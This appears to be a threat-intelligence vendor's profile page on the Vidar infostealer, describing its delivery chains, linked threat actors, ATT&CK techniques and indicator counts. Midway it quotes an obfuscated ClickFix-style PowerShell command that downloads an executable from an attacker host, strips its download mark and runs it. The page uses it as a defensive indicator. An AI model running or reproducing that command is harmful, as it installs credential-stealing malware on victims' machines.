Vidar is a Windows information-stealing malware family derived from Arkei and operated as a malware-as-a-service offering since 2018. It is widely used in commodity cybercrime and has remained one of the most prevalent infostealers in 2026 telemetry. Vidar primarily targets browser-stored data, including saved credentials, session cookies, autofill information, and other authentication material, and is also associated with theft of cryptocurrency wallet data and other sensitive host information. Stolen Vidar logs have been used as an initial-access commodity for follow-on intrusions into cloud and enterprise services.
Vidar is commonly delivered through social-engineering-driven infection chains rather than vulnerability exploitation. Observed delivery methods include malvertising, fake cracked-software downloads, trojanized repositories, spam or phishing attachments, fake installers, and ClickFix-style lures that trick users into executing attacker-supplied commands. Recent campaigns also used code-signing abuse, Go-compiled loaders, AutoIt-based loaders, in-memory execution, and DLL sideloading to evade detection and stage payloads.
Beyond credential theft, Vidar is well documented as a downloader for secondary payloads. In multiple 2026 campaigns it was used to retrieve and execute additional malware, including cryptocurrency miners and the TELEPUZ malware family. This makes Vidar both a data-theft tool and a post-compromise staging component in broader intrusion chains. It has been linked to financially motivated operations targeting consumers, small and medium-sized businesses, and organizations in the United States, Europe, and other regions. Vidar-harvested credentials have also been implicated in breaches of corporate cloud file-sharing and SaaS environments.
Recent reporting also notes Go-based Vidar variants and ongoing development activity, including a Vidar 2.0 rewrite in pure C. Across campaigns, Vidar consistently combines credential theft, session theft, exfiltration, and secondary payload delivery, making it a durable and versatile infostealer in the cybercrime ecosystem.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
12 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
UNC5142 (ClearFake Cluster): Primarily uses the BNB Smart Chain to distribute infostealers such as LUMMAC.V2 and Vidar via compromised WordPress sites.
Once activated, this malware frequently drops the notorious Vidar stealer to scrape sensitive data from the host machine.
GOLD HARVEST is known to employ commodity infostealers such as Vidar and Raccoon, which collect browser-saved passwords, cookies, and session tokens.
GOLD HARVEST is known to employ commodity infostealers such as Vidar and Raccoon, which collect browser-saved passwords, cookies, and session tokens.
Users who downloaded the archives received a loader that silently installed Vidar infostealer on their devices.
Microsoft linked Fox Tempest-enabled activity to ransomware and malware operations involving Vanilla Tempest, Rhysida, Oyster, Lumma Stealer, Vidar, INC, Qilin, Akira, and other families or affiliates.
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Rather than breaking into networks, modern threat actors buy their way in by purchasing “stealer logs” containing valid usernames, passwords, session cookies, and SSO tokens harvested from infected endpoints, then replaying those sessions directly against cloud consoles, SaaS platforms, and VPN gateways.
Organizations should train users never to paste commands from browser prompts into Run, Command Prompt, or PowerShell windows.
C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe -NoP -w h -ep bypass -c "$h='memsho'+'wblob[.]forum';$n='f322a5fa.exe';$u='https://'+$h+'/api/index.php?a=grab';$f=$env:TEMP+'\'+$n;[Net.WebClient]::new().('Down'+'loadFile')($u,$f);ri($f+':Zone.Identifier')-EA 0;& $f"
Rather than breaking into networks, modern threat actors buy their way in by purchasing “stealer logs” containing valid usernames, passwords, session cookies, and SSO tokens harvested from infected endpoints, then replaying those sessions directly against cloud consoles, SaaS platforms, and VPN gateways.
Rather than breaking into networks, modern threat actors buy their way in by purchasing “stealer logs” containing valid usernames, passwords, session cookies, and SSO tokens harvested from infected endpoints, then replaying those sessions directly against cloud consoles, SaaS platforms, and VPN gateways.
payloads embedded in JPEG and TXT files for in-memory execution... obfuscated JavaScript embedded in PDFs
with payloads embedded in JPEG and TXT files for in-memory execution... retrieves a Base64-encoded DLL appended to a JPEG hosted on public image services
Rather than breaking into networks, modern threat actors buy their way in by purchasing “stealer logs” containing valid usernames, passwords, session cookies, and SSO tokens harvested from infected endpoints, then replaying those sessions directly against cloud consoles, SaaS platforms, and VPN gateways.
Proxy execution through trusted Windows utilities RegSvcs.exe and RegAsm.exe
Related techniques include T1056 (Input Capture/keylogging) and T1557 (session/token interception), both observed across current stealer families.
Техники Credentials from Web Browsers (T1555.003) и Steal Web Session Cookie (T1539) по MITRE ATT&CK описывают этот вектор... украденный cookie сессии позволяет войти в аккаунт в обход двухфакторной аутентификации.
MITRE ATT&CK maps this behavior primarily to Credential Access (TA0006), specifically T1555 – Credentials from Password Stores and its sub-technique T1555.003 – Credentials from Web Browsers, covering theft of saved browser passwords, cookies, and autofill data.
Related techniques include T1056 (Input Capture/keylogging) and T1557 (session/token interception), both observed across current stealer families.
589 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Arkei-based malware-as-a-service information stealer that harvests browser credentials, cookies, two-factor authentication data, Tor Browser configurations, and cryptocurrency wallets. Recent campaigns used malvertising, fake cracked-software downloads, trojanized GitHub repositories, and payloads embedded in JPEG/TXT files for in-memory execution.
Named in the malware/tools list as a stealer; no further detail is provided in the content.
A durable long-running malware-as-a-service infostealer family. The content says it remains persistent in 2026 and that credentials harvested by Vidar were used in cloud-account compromise campaigns.
Infostealer described as stealing browser-saved passwords, session cookies, and autofill data.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.